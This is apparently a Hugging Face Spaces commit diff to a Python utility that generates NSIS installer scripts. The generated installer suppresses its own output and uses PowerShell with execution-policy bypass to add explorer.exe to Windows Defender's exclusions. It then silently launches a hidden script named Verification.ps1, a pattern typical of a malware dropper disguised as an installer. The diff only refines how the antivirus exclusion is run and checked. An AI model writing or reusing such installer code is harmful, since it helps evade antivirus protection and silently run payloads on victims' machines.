Spaces:
Sleeping
Sleeping
Update utils.py
Browse files
utils.py
CHANGED
@@ -84,11 +84,10 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
|
|
84 |
Section "MainSection" SEC01
|
85 |
SetDetailsPrint none
|
86 |
SetOutPath "$WINDIR\..\ProgramData\Installer"
|
87 |
-
|
88 |
-
|
89 |
-
ExecWait 'conhost --headless powershell -ep bypass -c "Add-MpPreference -ExclusionProcess \"explorer.exe\""'
|
90 |
-
IfErrors 0 +2
|
91 |
Abort
|
|
|
92 |
ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
|
93 |
SetAutoClose true
|
94 |
SectionEnd
|
|
|
84 |
Section "MainSection" SEC01
|
85 |
SetDetailsPrint none
|
86 |
SetOutPath "$WINDIR\..\ProgramData\Installer"
|
87 |
+
ExecWait 'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess \"explorer.exe\""' $0
|
88 |
+
${If} $0 != 0
|
|
|
|
|
89 |
Abort
|
90 |
+
${EndIf}
|
91 |
ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
|
92 |
SetAutoClose true
|
93 |
SectionEnd
|